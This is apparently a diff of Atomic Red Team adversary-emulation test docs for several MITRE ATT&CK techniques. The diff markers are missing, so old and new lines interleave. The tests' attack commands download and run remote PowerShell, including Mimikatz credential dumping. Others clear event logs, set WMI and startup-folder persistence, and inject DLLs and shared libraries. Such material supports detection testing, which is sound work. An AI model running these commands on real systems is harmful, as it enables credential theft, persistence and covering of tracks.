Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
@ -162,7 +166,9 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Supicious jse file run from startup Folder
jse files can be placed in and ran from the startup folder to maintain persistance.
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
Upon execution, "T1137 Hello, World JSE!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
@ -195,7 +201,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Supicious bat file run from startup Folder
bat files can be placed in and executed from the startup folder to maintain persistance.
Upon execution, cmd will be run and immediately closed.
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows

43
Atomic_Threat_Coverage/Triggers/T1044.md
View File

@ -21,9 +21,12 @@ Another variation of this technique can be performed by taking advantage of a we
## Atomic Test #1 - File System Permissions Weakness
This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file )
Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify
the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.
**Supported Platforms:** Windows
@ -32,7 +35,8 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
| weak_permission_file | check weak files permission | path | $env:TEMP&#92;T1044_weak_permission_file.txt|
| malicious_file | File to replace weak permission file with | path | $env:TEMP&#92;T1044&#92;T1044_malicious_file.txt|
#### Attack Commands: Run with `powershell`!
@ -40,12 +44,41 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
```powershell
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist on disk at specified location (#{weak_permission_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item #{weak_permission_file} -Force | Out-Null
Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file"
```
##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
##### Check Prereq Commands:
```powershell
if (Test-Path #{malicious_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null
New-Item #{malicious_file} -Force | Out-Null
Set-Content -Path #{malicious_file} -Value "T1044 Malicious file"
```
<br/>

4
Atomic_Threat_Coverage/Triggers/T1047.md
View File

@ -154,7 +154,7 @@ wmic process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
wmic process where name='#{process_to_execute}' delete
wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
@ -190,7 +190,7 @@ wmic /node:"#{node}" process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
wmic /node:"#{node}" process where name='#{process_to_execute}' delete
wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```

10
Atomic_Threat_Coverage/Triggers/T1050.md
View File

@ -6,15 +6,15 @@ Adversaries may install a new service that can be configured to execute at start
## Atomic Tests
- [Atomic Test #1 - Service Installation](#atomic-test-1---service-installation)
- [Atomic Test #1 - Service Installation CMD](#atomic-test-1---service-installation-cmd)
- [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell)
<br/>
## Atomic Test #1 - Service Installation
Installs A Local Service.
## Atomic Test #1 - Service Installation CMD
Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
@ -67,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Service Installation PowerShell
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will output via stdout.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
**Supported Platforms:** Windows
@ -85,7 +85,7 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
```powershell
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```

57
Atomic_Threat_Coverage/Triggers/T1055.md
View File

@ -27,15 +27,13 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
- [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)
- [Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-2---shared-library-injection-via-etcldsopreload)
- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
- [Atomic Test #3 - Shared Library Injection via LD_PRELOAD](#atomic-test-3---shared-library-injection-via-ld_preload)
- [Atomic Test #4 - Shared Library Injection via LD_PRELOAD](#atomic-test-4---shared-library-injection-via-ld_preload)
- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
- [Atomic Test #5 - Process Injection via C#](#atomic-test-5---process-injection-via-c)
- [Atomic Test #6 - svchost writing a file to a UNC path](#atomic-test-6---svchost-writing-a-file-to-a-unc-path)
- [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path)
<br/>
@ -43,7 +41,7 @@ Malware commonly utilizes process injection to access system resources through w
## Atomic Test #1 - Process Injection via mavinject.exe
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
**Supported Platforms:** Windows
@ -86,41 +84,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
<br/>
## Atomic Test #2 - Process Injection via PowerSploit
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
Upon successful execution, powershell.exe will download `Invoke-DLLInjection.ps1` and use it to inject into the `T1055.dll` shared library file.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Integer | (get-process spoolsv).id|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
```
<br/>
<br/>
## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload.
@ -150,7 +115,7 @@ echo #{path_to_shared_library} > /etc/ld.so.preload
<br/>
<br/>
## Atomic Test #4 - Shared Library Injection via LD_PRELOAD
## Atomic Test #3 - Shared Library Injection via LD_PRELOAD
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
@ -181,7 +146,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
<br/>
<br/>
## Atomic Test #5 - Process Injection via C#
## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
@ -218,9 +183,9 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
<br/>
<br/>
## Atomic Test #6 - svchost writing a file to a UNC path
## Atomic Test #5 - svchost writing a file to a UNC path
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows

12
Atomic_Threat_Coverage/Triggers/T1063.md
View File

@ -29,6 +29,9 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a
## Atomic Test #1 - Security Software Discovery
Methods to identify Security Software on an endpoint
when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
and specific security software.
**Supported Platforms:** Windows
@ -39,7 +42,7 @@ Methods to identify Security Software on an endpoint
```cmd
netsh.exe advfirewall firewall show all profiles
netsh.exe advfirewall show allprofiles
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
@ -58,6 +61,8 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell
Methods to identify Security Software on an endpoint
when sucessfully executed, powershell is going to processes related AV products if they are running.
**Supported Platforms:** Windows
@ -84,6 +89,7 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps
Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ).
**Supported Platforms:** Linux, macOS
@ -110,6 +116,8 @@ ps aux | grep CbOsxSensorService
## Atomic Test #4 - Security Software Discovery - Sysmon Service
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
**Supported Platforms:** Windows
@ -134,6 +142,8 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
Discovery of installed antivirus products via a WMI query.
when sucessfully executed, the test is going to display installed AV software.
**Supported Platforms:** Windows

28
Atomic_Threat_Coverage/Triggers/T1064.md
View File

@ -43,7 +43,7 @@ sh /tmp/art.sh
<br/>
## Atomic Test #2 - Create and Execute Batch Script
Creates and executes a simple batch script.
Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
**Supported Platforms:** Windows
@ -54,24 +54,36 @@ Creates and executes a simple batch script.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
| script_to_create | Path of script to create. | path | C:&#92;Windows&#92;TEMP&#92;execute.bat|
| script_path | Path of script to create. | path | $env:TEMP&#92;T1064_script.bat|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```powershell
Start-Process #{script_path}
```
#### Cleanup Commands:
```cmd
del #{script_to_create} >nul 2>&1
```powershell
Remove-Item #{script_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Batch file must exist on disk at specified location (#{script_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{script_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item #{script_path} -Force | Out-Null
Set-Content -Path #{script_path} -Value "#{command_to_execute}"
```
<br/>

5
Atomic_Threat_Coverage/Triggers/T1065.md
View File

@ -12,7 +12,8 @@
<br/>
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell
Testing uncommonly used port utilizing PowerShell
Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful
port check will be displayed.
**Supported Platforms:** Windows
@ -30,7 +31,7 @@ Testing uncommonly used port utilizing PowerShell
```powershell
test-netconnection -ComputerName #{domain} -port #{port}
Test-NetConnection -ComputerName #{domain} -port #{port}
```

9
Atomic_Threat_Coverage/Triggers/T1069.md
View File

@ -60,7 +60,8 @@ groups
<br/>
## Atomic Test #2 - Basic Permission Groups Discovery Windows
Basic Permission Groups Discovery for Windows
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
@ -86,7 +87,8 @@ net group "domain admins" /domain
<br/>
## Atomic Test #3 - Permission Groups Discovery PowerShell
Permission Groups Discovery utilizing PowerShell
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
@ -116,7 +118,8 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
## Atomic Test #4 - Elevated group enumeration using net group
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** Windows

16
Atomic_Threat_Coverage/Triggers/T1070.md
View File

@ -38,7 +38,7 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
<br/>
## Atomic Test #1 - Clear Logs
Upon execution this test will clear Windows Event Logs
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
@ -67,7 +67,8 @@ wevtutil cl #{log_name}
<br/>
## Atomic Test #2 - FSUtil
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
@ -82,6 +83,10 @@ Manages the update sequence number (USN) change journal, which provides a persis
fsutil usn deletejournal /D C:
```
#### Cleanup Commands:
```cmd
fsutil usn createjournal m=1000 a=100 c:
```
@ -174,7 +179,9 @@ echo 0> #{log_path}
<br/>
## Atomic Test #6 - Delete System Logs Using PowerShell
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created.
**Supported Platforms:** Windows
@ -204,7 +211,8 @@ Start-Service -Name EventLog
<br/>
## Atomic Test #7 - Delete System Logs Using Clear-EventLogId
Clear event logs using built-in PowerShell commands
Clear event logs using built-in PowerShell commands.
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows

19
Atomic_Threat_Coverage/Triggers/T1073.md
View File

@ -12,7 +12,8 @@ Adversaries likely use this technique as a means of masking actions they perform
<br/>
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
**Supported Platforms:** Windows
@ -23,13 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder&#92;T1073&#92;bin&#92;GUP.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
$PathToAtomicsFolder\T1073\bin\GUP.exe
#{gup_executable}
```
#### Cleanup Commands:
@ -39,6 +41,19 @@ taskkill /F /IM #{process_name}
#### Dependencies: Run with `powershell`!
##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"
```
<br/>

27
Atomic_Threat_Coverage/Triggers/T1074.md
View File

@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
#### Attack Commands: Run with `powershell`!
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
#### Cleanup Commands:
```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```
@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
#### Attack Commands: Run with `powershell`!
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
Remove-Item -Path #{output_file} -ErrorAction Ignore
```

6
Atomic_Threat_Coverage/Triggers/T1083.md
View File

@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
@ -55,7 +55,7 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows

10
Atomic_Threat_Coverage/Triggers/T1084.md
View File

@ -4,15 +4,14 @@
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
## Atomic Test #1 - Persistence via WMI Event Subscription
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject

7
Atomic_Threat_Coverage/Triggers/T1085.md
View File

@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
<br/>
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
@ -129,6 +129,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
@ -172,7 +173,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #5 - Rundll32 syssetup.dll Execution
Test execution of a command using rundll32.exe with syssetup.dll.
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
@ -216,7 +217,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #6 - Rundll32 setupapi.dll Execution
Test execution of a command using rundll32.exe with setupapi.dll.
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml

109
Atomic_Threat_Coverage/Triggers/T1086.md
View File

@ -22,29 +22,27 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
<br/>
## Atomic Test #1 - Mimikatz
Download Mimikatz and dump credentials
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
@ -75,7 +73,7 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - BloodHound
Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
and then compress and store the data to the temp directory on the machine
and then compress and store the data to the temp directory on the machine
**Supported Platforms:** Windows
@ -88,13 +86,17 @@ and then compress and store the data to the temp directory on the machine
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
```
#### Cleanup Commands:
```powershell
Remove-Item $env:temp\*BloodHound.zip -Force
```
@ -131,7 +133,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@ -180,39 +182,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
<br/>
<br/>
## Atomic Test #6 - PowerShell Add User
Using PS 5.1, add a user via CLI
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | atomic_user|
| full_name | Full name of user | string | Atomic Red Team|
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object - no prompt
## Atomic Test #6 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@ -243,10 +213,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
<br/>
<br/>
## Atomic Test #8 - Powershell MsXml COM object - with prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
## Atomic Test #7 - Powershell MsXml COM object - with prompt
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.i
**Supported Platforms:** Windows
@ -274,9 +244,10 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
<br/>
<br/>
## Atomic Test #9 - Powershell XML requests
## Atomic Test #8 - Powershell XML requests
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
**Supported Platforms:** Windows
@ -293,7 +264,7 @@ Powershell xml download request
```cmd
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@ -304,9 +275,10 @@ Powershell xml download request
<br/>
<br/>
## Atomic Test #10 - Powershell invoke mshta.exe download
## Atomic Test #9 - Powershell invoke mshta.exe download
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
**Supported Platforms:** Windows
@ -319,11 +291,11 @@ Powershell invoke mshta to download payload
